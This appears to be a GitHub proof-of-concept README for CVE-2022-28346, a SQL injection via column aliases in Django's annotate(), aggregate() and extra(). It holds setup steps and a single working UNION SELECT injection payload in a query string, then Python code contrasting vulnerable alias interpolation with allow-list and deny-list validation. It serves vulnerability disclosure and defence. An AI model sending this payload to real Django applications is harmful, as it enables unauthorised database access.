An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.

<h1 align="center">CVE-2022-28346 PoC <a href="https://twitter.com/intent/tweet?text=CVE-2022-28346 PoC : https://github.com/ahsentekdemir/CVE-2022-28346"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1>
### Impact:
- Potential SQL injection in QuerySet.annotate(), aggregate(), and extra().
## Installation
```
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
```
## PoC
```
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
```
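The root cause is that a dictionary key supplied by the client ends up as a column alias inside the generated SQL. An added example, not code from this repository or from Django, showing the defender-side check a view should run before expanding user data into `annotate(**kwargs)` or `aggregate(**kwargs)`: the alias from the PoC query string above is used as constructed sample input; the allow-list name `title_copy`, the toy SQL renderer and the deny-list regex (a restatement of the idea behind the patched releases, not Django's own code) are assumptions.

```python
import re

# Constructed sample input: the alias from the PoC query string above, exactly
# as a view doing annotate(**{request.GET["field"]: expr}) would receive it.
POC_ALIAS = 'poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --'

# Allow-list rule: a column alias must be a bare SQL identifier, nothing else.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Deny-list rule in the spirit of the patched releases (assumption: this is a
# restatement of that idea, not Django's own code): reject whitespace, quote
# characters, brackets, semicolons and SQL comment markers.
FORBIDDEN = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")


def alias_is_identifier(alias: str) -> bool:
    """True if the alias is a plain identifier and safe to quote as a column name."""
    return IDENTIFIER.fullmatch(alias) is not None


def alias_has_forbidden_chars(alias: str) -> bool:
    """True if the alias contains any character the deny-list rule rejects."""
    return FORBIDDEN.search(alias) is not None


def render_select_unvetted(alias: str, expr: str, table: str) -> str:
    """Toy rendering of the vulnerable behaviour: the alias is placed inside the
    identifier quotes of the generated SQL without being checked, so a closing
    quote in the alias ends the identifier early and the rest is read as SQL."""
    return f'SELECT {expr} AS "{alias}" FROM "{table}"'


def vet_annotation_kwargs(user_kwargs: dict, allowed: set) -> dict:
    """Fail-closed filter to run before annotate(**kwargs) / aggregate(**kwargs):
    every alias must be an identifier AND appear in an explicit allow-list.
    Raises ValueError on the first offending key."""
    vetted = {}
    for alias, expr in user_kwargs.items():
        if not alias_is_identifier(alias) or alias not in allowed:
            raise ValueError(f"rejected annotation alias: {alias!r}")
        vetted[alias] = expr
    return vetted


def render_select_vetted(alias: str, expr: str, table: str, allowed: set) -> str:
    """Hardened counterpart: same rendering, but only after the alias passes vetting."""
    vetted = vet_annotation_kwargs({alias: expr}, allowed)
    return render_select_unvetted(alias, vetted[alias], table)


def annotation_kwargs_are_safe(user_kwargs: dict, allowed: set) -> bool:
    """Boolean form of the same check, for callers that prefer not to catch exceptions."""
    try:
        vet_annotation_kwargs(user_kwargs, allowed)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    ALLOWED = {"title_copy"}  # hypothetical allow-list for this view
    # Vulnerable path: the payload is interpolated verbatim into the statement.
    print(render_select_unvetted(POC_ALIAS, "poc.title", "poc_blog"))
    # Hardened path: the payload is refused before any SQL is built.
    print(annotation_kwargs_are_safe({POC_ALIAS: "poc.title"}, ALLOWED))     # False
    print(annotation_kwargs_are_safe({"title_copy": "poc.title"}, ALLOWED))  # True
```

The allow-list check is the one to rely on: upgrading to a fixed Django release rejects the characters the deny-list covers, but a view that still lets the client choose alias names is trusting input it does not need to, so naming the permitted aliases explicitly removes the whole class of problem.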

## References
- [CVE Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28346)
- [Django](https://www.djangoproject.com/weblog/2022/apr/11/security-releases/)
```
[4.0K] /data/pocs/ae1f6781792de5129972f4c7ff3a3e0636727dc0
├── [4.0K] CVE_2022_28346
│   ├── [ 405] asgi.py
│   ├── [   0] __init__.py
│   ├── [3.2K] settings.py
│   ├── [ 808] urls.py
│   └── [ 405] wsgi.py
├── [ 189] data.json
├── [   0] __init__.py
├── [ 670] manage.py
├── [4.0K] poc
│   ├── [ 114] admin.py
│   ├── [ 138] apps.py
│   ├── [   0] __init__.py
│   ├── [4.0K] migrations
│   │   ├── [ 615] 0001_initial.py
│   │   ├── [ 413] 0002_auto_20220515_0015.py
│   │   └── [   0] __init__.py
│   ├── [ 178] models.py
│   ├── [  60] tests.py
│   └── [ 359] views.py
├── [ 25K] poc.png
├── [2.1K] poetry.lock
├── [ 285] pyproject.toml
└── [ 815] README.md

3 directories, 21 files
```